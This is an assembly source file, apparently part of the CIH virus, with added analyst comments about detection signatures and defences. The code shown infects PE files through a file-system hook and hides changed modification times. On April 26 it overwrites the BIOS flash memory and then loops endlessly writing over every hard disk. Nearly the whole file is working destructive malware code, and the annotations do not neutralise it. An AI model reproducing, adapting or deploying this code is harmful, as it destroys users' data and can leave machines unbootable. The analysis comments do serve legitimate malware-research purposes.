
📄 cih_13.asm

			; Adjust Size of Virus Section Code to Correct Value
			add	[eax], ebp
			add	[esp+08h], ebp

			; Set End Mark
			xor	ebx, ebx
			mov	[eax-04h], ebx

; ***************************
; * When VirusGame Calls    *
; * VxDCall, VMM Modifies   *
; * the 'int 20h' and the   *
; * 'Service Identifier'    *
; * to 'Call [XXXXXXXX]'.   *
; ***************************
; * Before Writing My Virus *
; * to File, I Must Restore *
; * them First.     ^__^    *
; ***************************

			; Walk the VxDCall sites backwards, starting at the last one, and
			; rewrite each as 'int 20h' followed by its dword service ID, so the
			; image written to disk does not carry VMM's run-time 'call [..]'
			; patches (see the banner above).
			; Analyst note: the on-disk copy therefore holds the byte pair CD 20
			; followed by each value of VxDCallIDTable, which is a stable pattern
			; for static signatures.
			; eax = address of the call site currently being restored.
			lea	eax, (LastVxDCallAddress-2-@9)[esi]

			; Loop counter. Only CL is loaded; NOTE(review): the 'loop' below
			; counts in ECX, so this presumably relies on the upper bits of ECX
			; being zero already - confirm against the code before this page.
			mov	cl, VxDCallTableSize

LoopOfRestoreVxDCallID:
			mov	word ptr [eax], 20cdh		; bytes CD 20 = 'int 20h'

			; Service ID for table entry ecx-1, stored right after the int 20h.
			mov	edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi]
			mov	[eax+2], edx

			; Step back by the byte distance to the previous call site.
			movzx	edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[esi]
			sub	eax, edx

			loop	LoopOfRestoreVxDCallID

; ***************************
; * Let's Write             *
; * Virus Code to the File  *
; ***************************

; Writes the queued code pieces to the open file, one file-I/O call per piece.
; Analyst note: state is fetched through DR1, a debug register used here as
; plain storage. Reading a debug register is a privileged instruction, so this
; path runs in a privileged (ring 0) context.
WriteVirusCodeToFile:
			; NOTE(review): what [eax] and [eax+10h] hold is set up outside
			; this page; from the calls below, [eax] is the address reached
			; through 'call edi' and [eax+10h] is passed along in EBX.
			mov	eax, dr1
			mov	ebx, [eax+10h]
			mov	edi, [eax]

LoopOfWriteVirusCodeToFile:

			; The stack holds three-dword records pushed by earlier code;
			; a record whose first dword is zero ends the list.
			pop	ecx
			jecxz	SetFileModificationMark

			mov	esi, ecx
			mov	eax, 0d601h	; function code handed to the file-I/O service in EAX
			pop	edx
			pop	ecx

			call	edi	; VXDCall IFSMgr_Ring0_FileIO

			jmp	LoopOfWriteVirusCodeToFile

; ***************************
; * Let's Set CF = 1 ==>    *
; * Need to Restore File    *
; * Modification Time       *
; ***************************

; Reached when the write list is exhausted. Records "file was modified" as
; CF=1 in a saved EFLAGS image on the stack.
SetFileModificationMark:
			; Drop two more dwords left on the stack by earlier code.
			pop	ebx
			pop	eax

			; The popf after CloseFile reads this flag back to decide whether
			; the original modification time has to be written back.
			stc		; Enable CF(Carry Flag)
			pushf

; *************************************
; * Close File                        *
; *************************************

; Closes the file through the same file-I/O service, then either restores the
; saved modification time (CF=1) or goes on to the date check (CF=0).
; Analyst note: because the original DOS-format timestamp is written back,
; infection does not change the file's modification time; integrity checks
; have to compare content (hashes, section sizes) rather than mtime.
CloseFile:
			xor	eax, eax
			mov	ah, 0d7h	; EAX = 0000d700h, the function code for this call
			call	edi	; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Need to Restore File Modification *
; * Time !?                           *
; *************************************

			popf			; flags image pushed before CloseFile
			pop	esi
			jnc	IsKillComputer	; CF=0: nothing to restore, run the date check

; *************************************
; * Restore File Modification Time    *
; *************************************

			mov	ebx, edi	; keep the service address; EDI is reused as an argument

			mov	ax, 4303h
			; Both loads read from the saved FileModificationTime field; the
			; second one starts two bytes into it.
			mov	ecx, (FileModificationTime-@7)[esi]
			mov	edi, (FileModificationTime+2-@7)[esi]
			call	ebx	; VXDCall IFSMgr_Ring0_FileIO

; *************************************
; * Disable OnBusy                    *
; *************************************

; Common exit of the hook: clears the re-entrancy marker, restores the saved
; registers and chains to the previously installed file-system API hook.
DisableOnBusy:
			dec	byte ptr (OnBusy-@7)[esi]	; Disable OnBusy

; *************************************
; * Call Previous FileSystemApiHook   *
; *************************************

prevhook:
			popad

			; DR0 is used as storage for a pointer to the previous hook's
			; address; control leaves through it and does not come back here.
			mov	eax, dr0	;
			jmp	[eax]		; Jump to prevhook

; *************************************
; * Call the Function that the IFS    *
; * Manager Would Normally Call to    *
; * Implement this Particular I/O     *
; * Request.                          *
; *************************************

; Pass-through path: performs the original I/O request itself, hands its
; result back to the caller, and records the file's modification time when
; the request was function 24h.
pIFSFunc:
			; The offsets below step over 20h bytes of saved registers
			; (presumably a pushad frame, matching the popad at the end) and
			; one more dword (04h) to reach the hook's stacked arguments.
			mov	ebx, esp
			push	dword ptr [ebx+20h+04h+14h]	; Push pioreq
			call	[ebx+20h+04h]			; Call pIFSFunc
			pop	ecx				; ECX = pioreq again

			; Slot 1ch of the saved-register frame is the EAX image, so the
			; popad below returns the real function's result to the caller.
			mov	[ebx+1ch], eax	; Modify EAX Value in Stack

; ***************************
; * After Calling pIFSFunc, *
; * Get Some Data from the  *
; * Returned pioreq.        *
; ***************************

			; Second stacked argument = function number.
			; NOTE(review): 24h is presumably the IFS 'open' function -
			; confirm against the IFS headers.
			cmp	dword ptr [ebx+20h+04h+04h], 00000024h
			jne	QuitMyVirusFileSystemHook

; *****************
; * Get the File  *
; * Modification  *
; * Date and Time *
; * in DOS Format.*
; *****************

			; Saved here so that the CloseFile path can write it back later.
			mov	eax, [ecx+28h]
			mov	(FileModificationTime-@6)[esi], eax

; ***************************
; * Quit My Virus'          *
; * IFSMgr_FileSystemHook   *
; ***************************

QuitMyVirusFileSystemHook:

			popad

			ret

; *************************************
; * Kill Computer !? ...   *^_^*      *
; *************************************

; Trigger check for the destructive routine: reads month and day straight
; from the CMOS real-time clock (index port 70h, data port 71h) and continues
; only on 04/26. The year is not read, so the condition recurs every year.
; Analyst note: the check bypasses the operating system's clock API, so it
; follows the hardware clock setting.
IsKillComputer:
			; Get Now Month from BIOS CMOS
			mov	ax, 0708h	; AL = 08h (first index), AH = 07h (second index)
			out	70h, al
			in	al, 71h

			xchg	ah, al		; AH = month value, AL = 07h

			; Get Now Day from BIOS CMOS
			out	70h, al
			in	al, 71h

			; AX = month:day; zero only for 04h:26h.
			; NOTE(review): assumes the clock returns BCD digits - confirm.
			xor	ax, 0426h	; 04/26/????
			jne	DisableOnBusy	; any other date: normal hook exit

; **************************************
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; * Kill Kill Kill Kill Kill Kill Kill *
; **************************************

; ***************************
; * Kill BIOS EEPROM        *
; ***************************

; NOTE(review): first destructive stage, reached only when the CMOS date
; check matched. It drives the IOForEEPROM helper (ports held in BP and DX)
; and the EnableEEPROMToWrite helper, then stores bytes into the
; 000E0000-000FFFFF window named in the banners below. Which chipset and
; flash part these constants fit is not stated on this page.
; Defensive relevance: a hardware or firmware flash write-protect makes these
; stores ineffective, and the cli/out instructions imply a privileged
; context, consistent with the debug-register reads elsewhere in the file.

			mov	bp, 0cf8h
			lea	esi, IOForEEPROM-@7[esi]	; ESI = address of the port helper

; ***********************
; * Show BIOS Page in   *
; * 000E0000 - 000EFFFF *
; *    (   64 KB   )    *
; ***********************

			mov	edi, 8000384ch
			mov	dx, 0cfeh
			cli			; interrupts stay disabled from here on
			call	esi

; ***********************
; * Show BIOS Page in   *
; * 000F0000 - 000FFFFF *
; *    (   64 KB   )    *
; ***********************

			mov	di, 0058h
			dec	edx					; and al,0fh
			; Self-modification: the store below overwrites the two-byte
			; instruction at BooleanCalculateCode with 24 0F ('and al,0fh');
			; the remark on the line above belongs to this store.
			mov	word ptr (BooleanCalculateCode-@10)[esi], 0f24h
			call	esi

; ***********************
; * Show the BIOS Extra *
; * ROM Data in Memory  *
; * 000E0000 - 000E01FF *
; *   (   512 Bytes   ) *
; * , and the Section   *
; * of Extra BIOS can   *
; * be Written...       *
; ***********************

			lea	ebx, EnableEEPROMToWrite-@10[esi]	; EBX = address of the second helper

			mov	eax, 0e5555h
			mov	ecx, 0e2aaah
			call	ebx
			mov	byte ptr [eax], 60h

			push	ecx
			loop	$		; busy-wait: spins until ECX reaches zero

; ***********************
; * Kill the BIOS Extra *
; * ROM Data in Memory  *
; * 000E0000 - 000E007F *
; *   (   80h Bytes   ) *
; ***********************

			xor	ah, ah
			mov	[eax], al

			xchg	ecx, eax
			loop	$		; second busy-wait, count taken from EAX

; ***********************
; * Show and Enable the *
; * BIOS Main ROM Data  *
; * 000E0000 - 000FFFFF *
; *   (   128 KB   )    *
; * can be Written...   *
; ***********************

			mov	eax, 0f5555h
			pop	ecx		; value pushed before the first busy-wait
			mov	ch, 0aah
			call	ebx
			mov	byte ptr [eax], 20h

			loop	$

; ***********************
; * Kill the BIOS Main  *
; * ROM Data in Memory  *
; * 000FE000 - 000FE07F *
; *   (   80h Bytes   ) *
; ***********************

			mov	ah, 0e0h
			mov	[eax], al

; ***********************
; * Hide BIOS Page in   *
; * 000F0000 - 000FFFFF *
; *    (   64 KB   )    *
; ***********************
									; or al,10h
			; Second self-modification of BooleanCalculateCode: bytes 0C 10
			; ('or al,10h'), as the remark above says.
			mov	word ptr (BooleanCalculateCode-@10)[esi], 100ch
			call	esi

; ***************************
; * Kill All HardDisk       *
; ***************************************************
; * IOR Structure of IOS_SendCommand Needs          *
; ***************************************************
; * ?? ?? ?? ?? 01 00 ?? ?? 01 05 00 40 ?? ?? ?? ?? *
; * 00 00 00 00 00 00 00 00 00 08 00 00 00 10 00 c0 *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? *
; * ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 80 ?? ?? *
; ***************************************************

; Second destructive stage. Builds on the stack the request block whose
; layout is given in the banner above (ESI points at it), then issues the
; IOS_SendCommand service in a loop.
; The loop has no exit: both branches below jump back to LoopOfKillHardDisk,
; so control never returns to the hook or to the operating system.
; NOTE(review): the meaning of the fields at +06h, +10h and +4dh is inferred
; only from how they are used here - confirm against the IOR definition.
; Defensive relevance: recovery from this stage depends on offline backups.
KillHardDisk:
			xor	ebx, ebx
			mov	bh, FirstKillHardDiskNumber
			push	ebx
			sub	esp, 2ch	; space left unset ('??' in the banner)
			push	0c0001000h
			mov	bh, 08h
			push	ebx
			push	ecx
			push	ecx
			push	ecx
			push	40000501h
			inc	ecx
			push	ecx
			push	ecx

			mov	esi, esp	; ESI = start of the request block
			sub	esp, 0ach

LoopOfKillHardDisk:
			int	20h
			dd	00100004h	; VXDCall IOS_SendCommand

			; Word at +06h is compared with 0017h after each request.
			cmp	word ptr [esi+06h], 0017h
			je	KillNextDataSection

ChangeNextHardDisk:
			inc	byte ptr [esi+4dh]	; advance the unit number held in the block

			jmp	LoopOfKillHardDisk

KillNextDataSection:
			; Advance the dword at +10h by EBX and start over at the first unit.
			add	dword ptr [esi+10h], ebx
			mov	byte ptr [esi+4dh], FirstKillHardDiskNumber

			jmp	LoopOfKillHardDisk

; ***************************
; * Enable EEPROM to Write  *
; ***************************

; Helper called through EBX by the BIOS stage.
; In:  EAX, ECX = two memory addresses chosen by the caller.
; Does: five byte stores - CL to [EAX], AL to [ECX], 80h to [EAX], then the
;       first two again. No register is changed.
; NOTE(review): presumably a command sequence for a flash device; the part it
; targets is not identified on this page.
EnableEEPROMToWrite:
			mov	[eax], cl
			mov	[ecx], al
			mov	byte ptr [eax], 80h
			mov	[eax], cl
			mov	[ecx], al

			ret

; ***************************
; * IO for EEPROM           *
; ***************************

; Helper called through ESI by the BIOS stage.
; In:  EDI = dword written to the port in BP; DX = byte port that is read
;      and written back.
; Does: out BP<-EDI, read a byte from DX, apply the two-byte instruction at
;       BooleanCalculateCode, out BP<-EDI again, write the byte to DX.
; The xchg pairs only swap EAX/EDI and EDX/BP around each 'out' and swap
; them back, so the caller's register assignment is kept.
; NOTE(review): the caller sets BP=0CF8h and DX=0CFEh, which fall in the PCI
; configuration address/data port range, so this is presumably a
; read-modify-write of one PCI configuration byte - confirm.
IOForEEPROM:
@10			=	IOForEEPROM

			xchg	eax, edi
			xchg	edx, ebp
			out	dx, eax

			xchg	eax, edi
			xchg	edx, ebp
			in	al, dx

; Patched at run time by the caller (self-modifying code); 'or al,44h' is
; only the initial form.
BooleanCalculateCode	=	$
			or	al, 44h

			xchg	eax, edi
			xchg	edx, ebp
			out	dx, eax

			xchg	eax, edi
			xchg	edx, ebp
			out	dx, al

			ret

; *********************************************************
; *			Static Data                       *
; *********************************************************

; Tables used by LoopOfRestoreVxDCallID to put the 'int 20h' + service ID
; form back at every VxDCall site before the code is written to a file.
LastVxDCallAddress	=	IFSMgr_Ring0_FileIO
; One byte per call site: distance back to the previous site (00h for the
; first), so each distance is assumed to fit in a byte.
VxDCallAddressTable	db	00h
			db	IFSMgr_RemoveFileSystemApiHook-_PageAllocate
			db	UniToBCSPath-IFSMgr_RemoveFileSystemApiHook
			db	IFSMgr_Ring0_FileIO-UniToBCSPath

; One dword service ID per call site; the order appears to match the labels
; in the distance table above. These constants are part of the on-disk image
; and are usable in static signatures.
VxDCallIDTable		dd	00010053h, 00400068h, 00400041h, 00400032h
VxDCallTableSize	=	($-VxDCallIDTable)/04h

; *********************************************************
; *                Virus Version Copyright                *
; *********************************************************

; Plain-text marker: 'CIH v', one digit, '.', one digit, ' TTIT'. The digits
; come from MajorVirusVersion / MinorVirusVersion, which are defined outside
; this page.
; Analyst note: the string sits before the VirusSize label, so it is
; presumably part of the image copied into files and can serve as a
; static detection string - confirm against the copy routine.
VirusVersionCopyright	db	'CIH v'
			db	MajorVirusVersion+'0'
			db	'.'
			db	MinorVirusVersion+'0'
			db	' TTIT'

; *********************************************************
; *			Virus Size                        *
; *********************************************************

VirusSize			=	$
;				+ SizeOfVirusCodeSectionTableEndMark(04h)
;				+ NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
;				+ SizeOfTheFirstVirusCodeSectionTable(04h)

; *********************************************************
; *			Dynamic Data                      *
; *********************************************************

; Run-time work area placed after the static part. The @6/@7/@8/@9 symbols
; are base points that the code subtracts when it addresses fields through
; ESI.
VirusGameDataStartAddress	=	VirusSize
@6				=	VirusGameDataStartAddress
OnBusy				db	0	; re-entrancy marker; decremented at DisableOnBusy
FileModificationTime		dd	?	; saved DOS-format time, written back after an infection

FileNameBuffer		db	FileNameBufferSize dup(?)
@7			=	FileNameBuffer

; Header read buffer. The field names and sizes follow the PE file header
; and optional header layout, starting at NumberOfSections.
DataBuffer		=	$
@8			=	DataBuffer
NumberOfSections	dw	?
TimeDateStamp		dd	?
SymbolsPointer		dd	?
NumberOfSymbols		dd	?
SizeOfOptionalHeader	dw	?
_Characteristics	dw	?
Magic			dw	?
LinkerVersion		dw	?
SizeOfCode		dd	?
SizeOfInitializedData	dd	?
SizeOfUninitializedData	dd	?
AddressOfEntryPoint	dd	?
BaseOfCode		dd	?
BaseOfData		dd	?
ImageBase		dd	?
@9			=	$
SectionAlignment	dd	?
FileAlignment		dd	?
OperatingSystemVersion	dd	?
ImageVersion		dd	?
SubsystemVersion	dd	?
Reserved		dd	?
SizeOfImage		dd	?
SizeOfHeaders		dd	?
SizeOfImageHeaderToRead		=	$-NumberOfSections

; The start of the buffer is reused for the new entry point value.
NewAddressOfEntryPoint	=	DataBuffer	; DWORD
SizeOfImageHeaderToWrite	=	04h

; Section-table entry fields, overlaid on the buffer from @9 onward.
; The offsets follow the 28h-byte PE section header layout.
StartOfSectionTable	=	@9
SectionName		=	StartOfSectionTable	; QWORD
VirtualSize		=	StartOfSectionTable+08h	; DWORD
VirtualAddress		=	StartOfSectionTable+0ch	; DWORD
SizeOfRawData		=	StartOfSectionTable+10h	; DWORD
PointerToRawData	=	StartOfSectionTable+14h	; DWORD
PointerToRelocations	=	StartOfSectionTable+18h	; DWORD
PointerToLineNumbers	=	StartOfSectionTable+1ch	; DWORD
NumberOfRelocations	=	StartOfSectionTable+20h	; WORD
NumberOfLinenNmbers	=	StartOfSectionTable+22h	; WORD
Characteristics		=	StartOfSectionTable+24h	; DWORD
SizeOfScetionTable	=	Characteristics+04h-SectionName

; *********************************************************
; *		Virus Total Need Memory                   *
; *********************************************************

VirusNeedBaseMemory	=	$

VirusTotalNeedMemory	=	@9
;				+ NumberOfSections(??)*SizeOfScetionTable(28h)
;				+ SizeOfVirusCodeSectionTableEndMark(04h)
;				+ NumberOfSections(??)*SizeOfVirusCodeSectionTable(08h)
;				+ SizeOfTheFirstVirusCodeSectionTable(04h)

; *********************************************************
; *********************************************************

VirusGame               ENDS

                        END     FileHeader
